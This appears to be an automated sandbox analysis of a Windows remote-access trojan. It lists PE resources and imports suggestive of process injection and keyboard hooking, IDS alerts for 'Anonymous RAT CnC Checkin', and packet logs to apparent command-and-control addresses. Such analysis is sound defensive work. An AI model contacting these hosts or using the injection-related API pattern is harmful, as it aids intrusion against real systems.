                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5176200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5176340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                    RT_GROUP_ICON0x5176480x22dataEnglishUnited States0.9411764705882353
                                                                                                                                                                                                                    RT_GROUP_ICON0x51766c0x22dataEnglishUnited States1.0294117647058822
                                                                                                                                                                                                                    RT_VERSION0x5176900x328dataEnglishUnited States0.44554455445544555
                                                                                                                                                                                                                    RT_MANIFEST0x5179b80x60fXML 1.0 document, ASCII text, with CRLF line terminators0.4229529335912315
                                                                                                                                                                                                                    RT_MANIFEST0x517fc80x298XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4894578313253012
                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                                                    user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                                                                    kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, CreateDirectoryA, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                                                                                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                                                                    user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TabbedTextOutA, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUserObjectInformationA, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetProcessWindowStation, GetParent, GetWindow, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExA, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CopyImage, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                    gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetEnhMetaFileBits, SetDIBitsToDevice, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, OffsetRgn, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateFontA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
                                                                                                                                                                                                                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                                                                    kernel32.dlllstrlenA, lstrcpyA, lstrcmpA, WriteProcessMemory, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, TryEnterCriticalSection, TerminateThread, TerminateProcess, SwitchToThread, SuspendThread, SleepEx, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetHandleInformation, SetFileTime, SetFilePointer, SetEvent, SetErrorMode, SetEnvironmentVariableA, SetEndOfFile, SetCurrentDirectoryA, SearchPathA, ResumeThread, ResetEvent, ReleaseMutex, ReadProcessMemory, ReadFile, QueueUserAPC, PulseEvent, PostQueuedCompletionStatus, OpenProcess, OpenMutexA, OpenFileMappingA, OpenEventA, MultiByteToWideChar, MulDiv, MoveFileA, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVolumeInformationA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatus, GetProcessTimes, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileType, GetFileSize, GetFileInformationByHandle, GetFileAttributesA, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FlushInstructionCache, FlushFileBuffers, FindResourceA, FindNextFileA, FindNextChangeNotification, FindFirstFileA, FindFirstChangeNotificationA, FindCloseChangeNotification, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitThread, EnumCalendarInfoA, EnterCriticalSection, DuplicateHandle, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessW, CreatePipe, CreateMutexA, CreateIoCompletionPort, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle
                                                                                                                                                                                                                    advapi32.dllSetSecurityDescriptorDacl, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey, InitializeSecurityDescriptor, GetUserNameA
                                                                                                                                                                                                                    kernel32.dllSleep
                                                                                                                                                                                                                    ole32.dllCLSIDFromString, CoTaskMemFree, StringFromCLSID
                                                                                                                                                                                                                    oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitializeEx, CoInitialize
                                                                                                                                                                                                                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                    comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                    shell32.dllShell_NotifyIconA, ShellExecuteA, SHGetFileInfoA
                                                                                                                                                                                                                    shell32.dllSHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder, SHBrowseForFolderA
                                                                                                                                                                                                                    comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                                                                                                                                                                                                                    advapi32.dllCreateProcessAsUserW
                                                                                                                                                                                                                    kernel32.dllSwitchToThread, MapViewOfFile, VirtualQuery, VirtualAlloc, VirtualProtect, GetSystemInfo
                                                                                                                                                                                                                    ntdll.dllRtlAnsiStringToUnicodeString, RtlUnicodeStringToAnsiString, RtlFreeAnsiString, NtQueryMutant, NtCreateMutant, NtWaitForSingleObject, NtTerminateProcess, NtQueryVirtualMemory, NtUnmapViewOfSection, NtOpenSection, NtCreateSection, NtQueryObject, NtClose, NtCurrentTeb, NtQuerySystemInformation
                                                                                                                                                                                                                    rpcrt4.dllUuidCreate, RpcStringFreeA, UuidFromStringA, UuidToStringA
                                                                                                                                                                                                                    kernel32.dllSignalObjectAndWait, InterlockedCompareExchange, FindNextFileA, FindFirstFileA, GetComputerNameExA
                                                                                                                                                                                                                    wsock32.dllWSACleanup, WSAStartup, WSAGetLastError, gethostbyname, shutdown, setsockopt, ioctlsocket, inet_addr, htons, getsockname, getpeername, connect, closesocket
                                                                                                                                                                                                                    ws2_32.dllWSAEnumNetworkEvents, WSAEventSelect, WSAGetOverlappedResult, WSASend, WSARecv, WSASocketA
                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                    HebrewIsrael
                                                                                                                                                                                                                    RussianRussia
                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                    2024-12-29T11:18:25.795527+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.749723118.107.44.21919091TCP
                                                                                                                                                                                                                    2024-12-29T11:19:39.214553+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.749736118.107.44.21919091TCP
                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Dec 29, 2024 11:18:10.521166086 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:10.640444040 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:10.640532017 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001669884 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001709938 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001722097 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001796961 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001862049 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001876116 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001888037 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001902103 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001939058 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.001962900 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.002077103 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.002089977 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.002104044 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.002135992 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.002167940 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.121339083 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.121362925 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.121418953 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.218907118 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.218987942 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.219074011 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.223100901 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.223157883 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.223237038 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.231463909 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.231612921 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.231687069 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.239789963 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.239902020 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.239995956 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.248245955 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.248276949 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.248416901 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.256557941 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.256688118 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.256759882 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.264990091 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.265078068 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.265204906 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.273305893 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.273467064 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.273556948 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.281609058 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.281699896 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.281780958 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.289988041 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.290075064 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.290148973 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.298369884 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.298383951 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.301585913 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.435750961 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.435780048 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.438554049 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.438647032 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.438687086 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.439846039 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.444312096 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.446327925 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.446403027 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.446432114 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.452155113 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.452306032 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.452359915 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.457828045 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.458014965 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.458093882 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.463593006 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.463728905 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.463810921 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.469383001 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.469475031 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.469826937 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.475058079 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.475136995 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.475159883 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.480772018 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.480865955 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.480894089 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.486548901 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.486587048 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.486613035 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.492280960 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.492337942 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.492384911 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.498033047 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.498085976 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.498092890 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.503762960 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.503815889 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.503823042 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.509491920 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.509536982 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.509577036 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.515841007 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.515856028 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.516127110 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.520960093 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.521004915 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.521040916 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.526670933 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.526738882 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.652779102 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.652843952 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.652910948 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.654912949 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.655011892 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.655088902 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.659235001 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.660792112 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.660831928 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.661004066 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.665146112 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.665221930 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.665261030 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.669523001 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.669599056 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.669646978 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.673858881 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.673935890 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.673942089 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.673988104 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.700573921 CET497068853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:12.819837093 CET885349706118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:13.992851973 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:14.112162113 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:14.112292051 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.098112106 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.098170996 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.098242044 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.131872892 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.131900072 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517343998 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517375946 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517391920 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517446041 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517575979 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517599106 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517611027 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517623901 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517640114 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517678022 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517815113 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517827034 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517838955 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517858982 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.517894983 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.637582064 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.637634993 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.637718916 CET497078853192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.736299992 CET885349707118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.736319065 CET885349707118.107.44.219192.168.2.7
